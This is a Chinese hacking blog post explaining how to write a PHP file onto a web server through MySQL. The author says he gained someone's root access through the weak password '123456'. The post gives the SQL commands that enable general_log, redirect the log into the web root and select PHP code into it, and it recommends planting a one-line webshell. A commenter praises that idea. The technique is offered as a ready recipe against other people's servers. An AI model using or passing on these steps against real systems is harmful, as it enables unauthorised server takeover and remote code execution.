• 告诉大家一个小秘密.域名后面加上 /siwa 发现不一样的世界…
  • 缓存测试2
  • 看看缓存好使不…
  • 啥时候是个头啊
  • 这特么又是哪个臭弟弟DD我呢?2020-02-12 12:15
  • 难受啊 马飞
  • 曾经自己 像浮萍一样无依
  • 说尼玛发工资还没信呢
  • 快走了…不算今天出除去周日还有5天!\(^o^)/
  • 还有半个月就走了…挺好的.

利用MySQL注入写出PHP(ASP)文件

PHP KIENG 1年前 (2019-03-23) 106245次浏览 已收录 1个吐槽 扫描二维码

利用 MySQL 注入写出 PHP(ASP)文件

今天偶尔得到一个 mysql 的 root 权限…(这个人密码就是 123456 我也是醉了)
然后我想看看他有什么文件,咋办呢?

#开启日志
set global general_log = on;

#设置日志保存地址(比如:/wwwroot/xxx/test.php)
set global general_log_file = '绝对路径';

#如果不知道绝对路径可以用这个命令看一下 
show variables like "%char%";

#写出文件
select '<?php echo 1; ?>';

然后你访问那个你设置的保存路径就能看见啦.

比如说file_put_content()之类的 或者 一句话木马啥的都可以


KIENG , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA 4.0协议进行授权
转载请注明出处:利用 MySQL 注入写出 PHP(ASP)文件
本文章链接:https://blog.kieng.cn/648.html
喜欢 (6)
KIENG
关于作者:
一个热衷网络的Man
发表我的评论
取消评论
表情 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 快速获取昵称
  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(1)个小伙伴在吐槽
  1. 一句话木马牛逼啊
    老哥2019-03-23 13:33 回复 Windows 10 | Chrome 69.0.3497.100